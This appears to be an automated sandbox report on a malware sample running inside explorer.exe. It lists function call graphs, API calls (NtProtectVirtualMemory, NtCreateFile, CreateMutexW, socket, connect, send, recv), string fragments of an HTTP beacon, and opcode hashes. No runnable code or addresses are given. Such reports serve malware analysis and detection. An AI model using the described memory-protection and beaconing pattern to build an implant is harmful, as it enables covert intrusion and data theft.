13728->13721 13729 e633b3d 13728->13729 13730 e63fe12 NtProtectVirtualMemory 13728->13730 13731 e63fe12 NtProtectVirtualMemory 13729->13731 13730->13729 13731->13732 13732->13721 13732->13727 13734 e63467a 13733->13734 13735 e63467e 13734->13735 13736 e63fe12 NtProtectVirtualMemory 13734->13736 13735->13722 13736->13734 13738 e63fe45 NtProtectVirtualMemory 13737->13738 13739 e63e942 13737->13739 13740 e63fe70 13738->13740 13739->13738 13740->13728 13742 e63a3c7 13741->13742 13745 e63a232 13742->13745 13744 e63a438 13744->13657 13746 e63a25e 13745->13746 13749 e6398c2 13746->13749 13748 e63a26b 13748->13744 13751 e639934 13749->13751 13750 e6399a6 13750->13748 13751->13750 13752 e639995 ObtainUserAgentString 13751->13752 13752->13750 13490 e63e232 13491 e63e25c 13490->13491 13493 e63e334 13490->13493 13492 e63e410 NtCreateFile 13491->13492 13491->13493 13492->13493 13838 e6330f1 13839 e633109 13838->13839 13840 e6331d3 13838->13840 13841 e633012 6 API calls 13839->13841 13842 e633113 13841->13842 13842->13840 13843 e63ef82 6 API calls 13842->13843 13843->13840 13939 e6345f1 13940 e634606 13939->13940 13941 e63460e 13939->13941 13942 e639662 6 API calls 13940->13942 13942->13941 13943 e6409f1 13944 e6409f7 13943->13944 13947 e635852 13944->13947 13946 e640a0f 13948 e635865 13947->13948 13949 e6358e4 13947->13949 13948->13949 13951 e635887 13948->13951 13953 e63587e 13948->13953 13949->13946 13950 e63b36f 13950->13946 13951->13949 13952 e639662 6 API calls 13951->13952 13952->13949 13953->13950 13954 e63b0c2 6 API calls 13953->13954 13954->13950 13844 e6372f4 13845 e637349 13844->13845 13846 e63749f 13845->13846 13848 e6338f2 NtProtectVirtualMemory 13845->13848 13847 e6338f2 NtProtectVirtualMemory 13846->13847 13851 e6374c3 13846->13851 13847->13851 13849 e637480 13848->13849 13850 e6338f2 NtProtectVirtualMemory 13849->13850 13850->13846 13852 e6338f2 NtProtectVirtualMemory 13851->13852 13853 e637597 13851->13853 13852->13853 13854 e6338f2 NtProtectVirtualMemory 13853->13854 13855 e6375bf 13853->13855 13854->13855 13858 e6338f2 NtProtectVirtualMemory 13855->13858 13859 e6376b9 13855->13859 13856 e6376e1 13857 e63a382 ObtainUserAgentString 13856->13857 13860 e6376e9 13857->13860 13858->13859 13859->13856 13861 e6338f2 NtProtectVirtualMemory 13859->13861 13861->13856 13959 e6409b3 13960 e6409bd 13959->13960 13963 e6356d2 13960->13963 13962 e6409e0 13964 e6356f7 13963->13964 13965 e635704 13963->13965 13966 e6330f2 6 API calls 13964->13966 13967 e6356ff 13965->13967 13968 e63572d 13965->13968 13970 e635737 13965->13970 13966->13967 13967->13962 13972 e63b2c2 13968->13972 13970->13967 13971 e63ef82 6 API calls 13970->13971 13971->13967 13973 e63b2cb 13972->13973 13974 e63b2df 13972->13974 13973->13974 13975 e63b0c2 6 API calls 13973->13975 13974->13967 13975->13974 13862 e6370fb 13864 e637137 13862->13864 13863 e6372d5 13864->13863 13865 e6338f2 NtProtectVirtualMemory 13864->13865 13866 e63728a 13865->13866 13867 e6338f2 NtProtectVirtualMemory 13866->13867 13870 e6372a9 13867->13870 13868 e6372cd 13869 e63a382 ObtainUserAgentString 13868->13869 13869->13863 13870->13868 13871 e6338f2 NtProtectVirtualMemory 13870->13871 13871->13868 13786 e63d83a 13787 e63d841 13786->13787 13788 e63ef82 6 API calls 13787->13788 13789 e63d8c5 13788->13789 13790 e63d906 13789->13790 13791 e63e232 NtCreateFile 13789->13791 13791->13790 13904 e63ef7a 13906 e63efb8 13904->13906 13905 e63f022 13906->13905 13907 e63b5b2 socket 13906->13907 13908 e63f081 13906->13908 13907->13908 13908->13905 13909 e63f134 13908->13909 13911 e63f117 getaddrinfo 13908->13911 13909->13905 13910 e63b732 connect 13909->13910 13912 e63f1b2 13909->13912 13910->13912 13911->13909 13912->13905 13913 e63b6b2 send 13912->13913 13915 e63f729 13913->13915 13914 e63f7f4 setsockopt recv 13914->13905 13915->13905 13915->13914 13892 e63b0b9 13893 e63b0ed 13892->13893 13895 e63b1f0 13892->13895 13894 e63ef82 6 API calls 13893->13894 13893->13895 13894->13895 13976 e636fbf 13977 e637016 13976->13977 13978 e6370bb 13977->13978 13981 e6338f2 NtProtectVirtualMemory 13977->13981 13982 e6370f0 13977->13982 13979 e6370e8 13978->13979 13983 e6338f2 NtProtectVirtualMemory 13978->13983 13980 e63a382 ObtainUserAgentString 13979->13980 13980->13982 13981->13978 13983->13979 13896 e6398be 13898 e6398c3 13896->13898 13897 e6399a6 13898->13897 13899 e639995 ObtainUserAgentString 13898->13899 13899->13897 13500 e63ef82 13501 e63efb8 13500->13501 13503 e63f081 13501->13503 13511 e63f022 13501->13511 13512 e63b5b2 13501->13512 13504 e63f134 13503->13504 13506 e63f117 getaddrinfo 13503->13506 13503->13511 13509 e63f1b2 13504->13509 13504->13511 13515 e63b732 13504->13515 13506->13504 13508 e63f7f4 setsockopt recv 13508->13511 13509->13511 13518 e63b6b2 13509->13518 13510 e63f729 13510->13508 13510->13511 13513 e63b60a socket 13512->13513 13514 e63b5ec 13512->13514 13513->13503 13514->13513 13516 e63b76a 13515->13516 13517 e63b788 connect 13515->13517 13516->13517 13517->13509 13519 e63b6e7 13518->13519 13520 e63b705 send 13518->13520 13519->13520 13520->13510 13753 e640a4d 13754 e640a53 13753->13754 13757 e634782 13754->13757 13756 e640a6b 13758 e63478f 13757->13758 13759 e6347ad 13758->13759 13761 e639662 13758->13761 13759->13756 13762 e63966b 13761->13762 13770 e6397ba 13761->13770 13763 e6330f2 6 API calls 13762->13763 13762->13770 13765 e6396ee 13763->13765 13764 e639750 13767 e63983f 13764->13767 13769 e639791 13764->13769 13764->13770 13765->13764 13766 e63ef82 6 API calls 13765->13766 13766->13764 13768 e63ef82 6 API calls 13767->13768 13767->13770 13768->13770 13769->13770 13771 e63ef82 6 API calls 13769->13771 13770->13759 13771->13770 13792 e63fe0a 13793 e63e942 13792->13793 13794 e63fe45 NtProtectVirtualMemory 13793->13794 13795 e63fe70 13794->13795 13920 e63814a 13921 e638153 13920->13921 13925 e638174 13920->13925 13923 e63a382 ObtainUserAgentString 13921->13923 13922 e6381e7 13924 e63816c 13923->13924 13926 e6330f2 6 API calls 13924->13926 13925->13922 13928 e6331f2 13925->13928 13926->13925 13929 e63320f 13928->13929 13933 e6332c9 13928->13933 13930 e63df12 7 API calls 13929->13930 13931 e633242 13929->13931 13930->13931 13932 e633289 13931->13932 13935 e634432 NtCreateFile 13931->13935 13932->13933 13934 e6330f2 6 API calls 13932->13934 13933->13925 13934->13933 13935->13932 13796 e634613 13798 e634620 13796->13798 13797 e63467e 13798->13797 13799 e63fe12 NtProtectVirtualMemory 13798->13799 13799->13798 13494 e63fe12 13495 e63fe45 NtProtectVirtualMemory 13494->13495 13498 e63e942 13494->13498 13497 e63fe70 13495->13497 13499 e63e967 13498->13499 13499->13495 13872 e638cd4 13874 e638cd8 13872->13874 13873 e639022 13874->13873 13875 e638352 NtCreateFile 13874->13875 13876 e638f0d 13875->13876 13876->13873 13877 e638792 NtCreateFile 13876->13877 13877->13876 13955 e636dd9 13956 e636df0 13955->13956 13957 e63a382 ObtainUserAgentString 13956->13957 13958 e636ecd 13956->13958 13957->13958 13800 e640a1f 13801 e640a25 13800->13801 13804 e6345f2 13801->13804 13803 e640a3d 13805 e6345fb 13804->13805 13806 e63460e 13804->13806 13805->13806 13807 e639662 6 API calls 13805->13807 13806->13803 13807->13806 13525 e6332dd 13529 e63331a 13525->13529 13526 e6333fa 13527 e633328 SleepEx 13527->13527 13527->13529 13529->13526 13529->13527 13532 e63df12 13529->13532 13541 e634432 13529->13541 13551 e6330f2 13529->13551 13534 e63df48 13532->13534 13533 e63e134 13533->13529 13534->13533 13535 e63e0e9 13534->13535 13540 e63e232 NtCreateFile 13534->13540 13557 e63ef82 13534->13557 13536 e63e125 13535->13536 13569 e63d842 13535->13569 13577 e63d922 13536->13577 13540->13534 13542 e63445b 13541->13542 13550 e6344c9 13541->13550 13543 e63e232 NtCreateFile 13542->13543 13542->13550 13544 e634496 13543->13544 13545 e6344c5 13544->13545 13589 e634082 13544->13589 13547 e63e232 NtCreateFile 13545->13547 13545->13550 13547->13550 13548 e6344b6 13548->13545 13598 e633f52 13548->13598 13550->13529 13552 e633109 13551->13552 13553 e6331d3 13551->13553 13603 e633012 13552->13603 13553->13529 13555 e633113 13555->13553 13556 e63ef82 6 API calls 13555->13556 13556->13553 13558 e63efb8 13557->13558 13559 e63b5b2 socket 13558->13559 13560 e63f081 13558->13560 13568 e63f022 13558->13568 13559->13560 13561 e63f134 13560->13561 13563 e63f117 getaddrinfo 13560->13563 13560->13568 13562 e63b732 connect 13561->13562 13566 e63f1b2 13561->13566 13561->13568 13562->13566 13563->13561 13564 e63b6b2 send 13567 e63f729 13564->13567 13565 e63f7f4 setsockopt recv 13565->13568 13566->13564 13566->13568 13567->13565 13567->13568 13568->13534 13570 e63d86d 13569->13570 13585 e63e232 13570->13585 13572 e63d906 13572->13535 13573 e63d888 13573->13572 13574 e63ef82 6 API calls 13573->13574 13575 e63d8c5 13573->13575 13574->13575 13575->13572 13576 e63e232 NtCreateFile 13575->13576 13576->13572 13578 e63d9c2 13577->13578 13579 e63e232 NtCreateFile 13578->13579 13580 e63d9d6 13579->13580 13581 e63da9f 13580->13581 13583 e63ef82 6 API calls 13580->13583 13584 e63da5d 13580->13584 13581->13533 13582 e63e232 NtCreateFile 13582->13581 13583->13584 13584->13581 13584->13582 13586 e63e25c 13585->13586 13588 e63e334 13585->13588 13587 e63e410 NtCreateFile 13586->13587 13586->13588 13587->13588 13588->13573 13590 e634420 13589->13590 13591 e6340aa 13589->13591 13590->13548 13591->13590 13592 e63e232 NtCreateFile 13591->13592 13594 e6341f9 13592->13594 13593 e6343df 13593->13548 13594->13593 13595 e63e232 NtCreateFile 13594->13595 13596 e6343c9 13595->13596 13597 e63e232 NtCreateFile 13596->13597 13597->13593 13599 e633f70 13598->13599 13600 e633f84 13598->13600 13599->13545 13601 e63e232 NtCreateFile 13600->13601 13602 e634046 13601->13602 13602->13545 13604 e633031 13603->13604 13605 e6330cd 13604->13605 13606 e63ef82 6 API calls 13604->13606 13605->13555 13606->13605 13878 e636edd 13880 e636f06 13878->13880 13879 e636fa4 13880->13879 13881 e6338f2 NtProtectVirtualMemory 13880->13881 13882 e636f9c 13881->13882 13883 e63a382 ObtainUserAgentString 13882->13883 13883->13879

                                                                            Executed Functions

                                                                            Function 0E63EF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 e63ef82-e63efb6 1 e63efd6-e63efd9 0->1 2 e63efb8-e63efbc 0->2 4 e63efdf-e63efed 1->4 5 e63f8fe-e63f90c 1->5 2->1 3 e63efbe-e63efc2 2->3 3->1 6 e63efc4-e63efc8 3->6 7 e63eff3-e63eff7 4->7 8 e63f8f6-e63f8f7 4->8 6->1 9 e63efca-e63efce 6->9 10 e63eff9-e63effd 7->10 11 e63efff-e63f000 7->11 8->5 9->1 12 e63efd0-e63efd4 9->12 10->11 13 e63f00a-e63f010 10->13 11->13 12->1 12->4 14 e63f012-e63f020 13->14 15 e63f03a-e63f060 13->15 14->15 18 e63f022-e63f026 14->18 16 e63f062-e63f066 15->16 17 e63f068-e63f07c call e63b5b2 15->17 16->17 19 e63f0a8-e63f0ab 16->19 22 e63f081-e63f0a2 17->22 18->8 21 e63f02c-e63f035 18->21 23 e63f0b1-e63f0b8 19->23 24 e63f144-e63f150 19->24 21->8 22->19 26 e63f8ee-e63f8ef 22->26 27 e63f0e2-e63f0f5 23->27 28 e63f0ba-e63f0dc call e63e942 23->28 25 e63f156-e63f165 24->25 24->26 31 e63f167-e63f178 call e63b552 25->31 32 e63f17f-e63f18f 25->32 26->8 27->26 30 e63f0fb-e63f101 27->30 28->27 30->26 34 e63f107-e63f109 30->34 31->32 36 e63f191-e63f1ad call e63b732 32->36 37 e63f1e5-e63f21b 32->37 34->26 40 e63f10f-e63f111 34->40 43 e63f1b2-e63f1da 36->43 38 e63f22d-e63f231 37->38 39 e63f21d-e63f22b 37->39 45 e63f233-e63f245 38->45 46 e63f247-e63f24b 38->46 44 e63f27f-e63f280 39->44 40->26 47 e63f117-e63f132 getaddrinfo 40->47 43->37 48 e63f1dc-e63f1e1 43->48 52 e63f283-e63f2e0 call e63fd62 call e63c482 call e63be72 call e640002 44->52 45->44 49 e63f261-e63f265 46->49 50 e63f24d-e63f25f 46->50 47->24 51 e63f134-e63f13c 47->51 48->37 53 e63f267-e63f26b 49->53 54 e63f26d-e63f279 49->54 50->44 51->24 63 e63f2e2-e63f2e6 52->63 64 e63f2f4-e63f354 call e63fd92 52->64 53->52 53->54 54->44 63->64 65 e63f2e8-e63f2ef call e63c042 63->65 69 e63f35a-e63f396 call e63fd62 call e640262 call e640002 64->69 70 e63f48c-e63f4b8 call e63fd62 call e640262 64->70 65->64 85 e63f3bb-e63f3e9 call e640262 * 2 69->85 86 e63f398-e63f3b7 call e640262 call e640002 69->86 80 e63f4ba-e63f4d5 70->80 81 e63f4d9-e63f590 call e640262 * 3 call e640002 * 2 call e63c482 70->81 80->81 109 e63f595-e63f5b9 call e640262 81->109 101 e63f415-e63f41d 85->101 102 e63f3eb-e63f410 call e640002 call e640262 85->102 86->85 103 e63f442-e63f448 101->103 104 e63f41f-e63f425 101->104 102->101 103->109 110 e63f44e-e63f456 103->110 107 e63f467-e63f487 call e640262 104->107 108 e63f427-e63f43d 104->108 107->109 108->109 120 e63f5d1-e63f6ad call e640262 * 7 call e640002 call e63fd62 call e640002 call e63be72 call e63c042 109->120 121 e63f5bb-e63f5cc call e640262 call e640002 109->121 110->109 114 e63f45c-e63f45d 110->114 114->107 132 e63f6af-e63f6b3 120->132 121->132 134 e63f6b5-e63f6fa call e63b382 call e63b7b2 132->134 135 e63f6ff-e63f72d call e63b6b2 132->135 155 e63f8e6-e63f8e7 134->155 145 e63f72f-e63f735 135->145 146 e63f75d-e63f761 135->146 145->146 149 e63f737-e63f74c 145->149 150 e63f767-e63f76b 146->150 151 e63f90d-e63f913 146->151 149->146 156 e63f74e-e63f754 149->156 152 e63f771-e63f773 150->152 153 e63f8aa-e63f8df call e63b7b2 150->153 157 e63f779-e63f784 151->157 158 e63f919-e63f920 151->158 152->153 152->157 153->155 155->26 156->146 163 e63f756 156->163 159 e63f786-e63f793 157->159 160 e63f795-e63f796 157->160 158->159 159->160 164 e63f79c-e63f7a0 159->164 160->164 163->146 167 e63f7a2-e63f7af 164->167 168 e63f7b1-e63f7b2 164->168 167->168 170 e63f7b8-e63f7c4 167->170 168->170 173 e63f7c6-e63f7ef call e63fd92 call e63fd62 170->173 174 e63f7f4-e63f861 setsockopt recv 170->174 173->174 177 e63f8a3-e63f8a4 174->177 178 e63f863 174->178 177->153 178->177 181 e63f865-e63f86a 178->181 181->177 184 e63f86c-e63f872 181->184 184->177 185 e63f874-e63f8a1 184->185 185->177 185->178
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: getaddrinforecvsetsockopt
                                                                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                            • API String ID: 1564272048-1117930895
                                                                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                            • Instruction ID: 24f853ddee4357311a24fdd71b3ea095b452a61f834aaa99deeda68bec25f5cc
                                                                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                            • Instruction Fuzzy Hash: 66528230618B088BCB69EF78E4947EAB7E1FB55300F60492ED49FC7246DE70A949C785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E63E232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 303 e63e232-e63e256 304 e63e8bd-e63e8cd 303->304 305 e63e25c-e63e260 303->305 305->304 306 e63e266-e63e2a0 305->306 307 e63e2a2-e63e2a6 306->307 308 e63e2bf 306->308 307->308 309 e63e2a8-e63e2ac 307->309 310 e63e2c6 308->310 311 e63e2b4-e63e2b8 309->311 312 e63e2ae-e63e2b2 309->312 313 e63e2cb-e63e2cf 310->313 311->313 314 e63e2ba-e63e2bd 311->314 312->310 315 e63e2d1-e63e2f7 call e63e942 313->315 316 e63e2f9-e63e30b 313->316 314->313 315->316 320 e63e378 315->320 316->320 321 e63e30d-e63e332 316->321 324 e63e37a-e63e3a0 320->324 322 e63e3a1-e63e3a8 321->322 323 e63e334-e63e33b 321->323 327 e63e3d5-e63e3dc 322->327 328 e63e3aa-e63e3d3 call e63e942 322->328 325 e63e366-e63e370 323->325 326 e63e33d-e63e360 call e63e942 323->326 325->320 332 e63e372-e63e373 325->332 326->325 329 e63e410-e63e458 NtCreateFile call e63e172 327->329 330 e63e3de-e63e40a call e63e942 327->330 328->320 328->327 339 e63e45d-e63e45f 329->339 330->320 330->329 332->320 339->320 340 e63e465-e63e46d 339->340 340->320 341 e63e473-e63e476 340->341 342 e63e486-e63e48d 341->342 343 e63e478-e63e481 341->343 344 e63e4c2-e63e4ec 342->344 345 e63e48f-e63e4b8 call e63e942 342->345 343->324 351 e63e4f2-e63e4f5 344->351 352 e63e8ae-e63e8b8 344->352 345->320 350 e63e4be-e63e4bf 345->350 350->344 353 e63e604-e63e611 351->353 354 e63e4fb-e63e4fe 351->354 352->320 353->324 355 e63e500-e63e507 354->355 356 e63e55e-e63e561 354->356 359 e63e509-e63e532 call e63e942 355->359 360 e63e538-e63e559 355->360 361 e63e567-e63e572 356->361 362 e63e616-e63e619 356->362 359->320 359->360 366 e63e5e9-e63e5fa 360->366 367 e63e5a3-e63e5a6 361->367 368 e63e574-e63e59d call e63e942 361->368 364 e63e6b8-e63e6bb 362->364 365 e63e61f-e63e626 362->365 370 e63e739-e63e73c 364->370 371 e63e6bd-e63e6c4 364->371 373 e63e657-e63e66b call e63fe92 365->373 374 e63e628-e63e651 call e63e942 365->374 366->353 367->320 369 e63e5ac-e63e5b6 367->369 368->320 368->367 369->320 377 e63e5bc-e63e5e6 369->377 381 e63e742-e63e749 370->381 382 e63e7c4-e63e7c7 370->382 378 e63e6c6-e63e6ef call e63e942 371->378 379 e63e6f5-e63e734 371->379 373->320 391 e63e671-e63e6b3 373->391 374->320 374->373 377->366 378->352 378->379 401 e63e894-e63e8a9 379->401 384 e63e74b-e63e774 call e63e942 381->384 385 e63e77a-e63e7bf 381->385 382->320 387 e63e7cd-e63e7d4 382->387 384->352 384->385 385->401 392 e63e7d6-e63e7f6 call e63e942 387->392 393 e63e7fc-e63e803 387->393 391->324 392->393 399 e63e805-e63e825 call e63e942 393->399 400 e63e82b-e63e835 393->400 399->400 400->352 402 e63e837-e63e83e 400->402 401->324 402->352 406 e63e840-e63e886 402->406 406->401
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: `
                                                                            • API String ID: 823142352-2679148245
                                                                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                            • Instruction ID: 66f24d52847d2c429417704df8722b1a2414cb7c848f8c7b53336102d0d16cce
                                                                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                            • Instruction Fuzzy Hash: E5225A70A18B099FDB59DF38D4986AAF7E1FB98300F50062EE45ED7250DB31E851CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E63FE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 447 e63fe12-e63fe38 448 e63fe45-e63fe6e NtProtectVirtualMemory 447->448 449 e63fe40 call e63e942 447->449 450 e63fe70-e63fe7c 448->450 451 e63fe7d-e63fe8f 448->451 449->448
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL ref: 0E63FE67
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                            • Instruction ID: 429ae53d18b6a7c2867cf7a7fe2dd6749827a12bf60fca4f9a9fec46b0bd91a5
                                                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                            • Instruction Fuzzy Hash: F8019230628B484F8784EF7CA480126B7E4FBC9314F000B3EE59AC7254D760C5414742
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E63FE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 452 e63fe0a-e63fe6e call e63e942 NtProtectVirtualMemory 455 e63fe70-e63fe7c 452->455 456 e63fe7d-e63fe8f 452->456
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL ref: 0E63FE67
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                            • Instruction ID: eedce1597bd3453fb98cac6c0c71676d75669c5538aa93d4bafd164783e21019
                                                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                            • Instruction Fuzzy Hash: E501A734628B884B8744EB7C94412A6B3E5FBCE314F000B3EE59AC3241DB21D5014782
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E6398C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ObtainUserAgentString.URLMON ref: 0E6399A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: AgentObtainStringUser
                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                            • API String ID: 2681117516-319646191
                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                            • Instruction ID: b61d80416e983574d158c4dca8ce6a2a0b584afbda0597144e828c8227ffa9ea
                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                            • Instruction Fuzzy Hash: B531D171614A1C8BCF45EFA8D8847EDB7E1FB58305F40062EE45ED7240DE788A45CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E6398BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ObtainUserAgentString.URLMON ref: 0E6399A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: AgentObtainStringUser
                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                            • API String ID: 2681117516-319646191
                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                            • Instruction ID: d76ed9447c327f199b4a8f96f059dfbab34ac69705779b05c503290108f63ce5
                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                            • Instruction Fuzzy Hash: A621E370A14A1C8ACF45EFA8D8447EDBBE1FF59305F40461EE45AD7244DE788A048B89
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E635B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 232 e635b66-e635b68 233 e635b93-e635bb8 232->233 234 e635b6a-e635b6b 232->234 235 e635bbb-e635bbc 233->235 236 e635bbe-e635c22 call e63c612 call e63e942 * 2 234->236 237 e635b6d-e635b71 234->237 235->236 246 e635c28-e635c2b 236->246 247 e635cdc 236->247 237->235 238 e635b73-e635b92 237->238 238->233 246->247 249 e635c31-e635cd3 call e640da4 call e640022 call e6403e2 call e640022 call e6403e2 CreateMutexW 246->249 248 e635cde-e635cf6 247->248 249->247 263 e635cd5-e635cda 249->263 263->248
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID: .dll$el32$kern
                                                                            • API String ID: 1964310414-1222553051
                                                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                            • Instruction ID: 79740f492a4ebd70206cefd37054c577008bcd9e8c09d13b1131e388701f0c04
                                                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                            • Instruction Fuzzy Hash: 40417B70918A088FDB94EFA8D8D87AD77E0FFA8300F14467ED84ADB255DE309945CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E635B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID: .dll$el32$kern
                                                                            • API String ID: 1964310414-1222553051
                                                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                            • Instruction ID: 706a07ba534bfd71e2b3ec11bf02bba7474b67f120840407fca87c511f87f9ae
                                                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                            • Instruction Fuzzy Hash: F1413970918A088FDB84EFA8D498BED77E1FF68300F14456EC84ADB256DE309945CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0E63B72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 293 e63b72e-e63b768 294 e63b76a-e63b782 call e63e942 293->294 295 e63b788-e63b7ab connect 293->295 294->295
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: connect
                                                                            • String ID: conn$ect
                                                                            • API String ID: 1959786783-716201944
                                                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
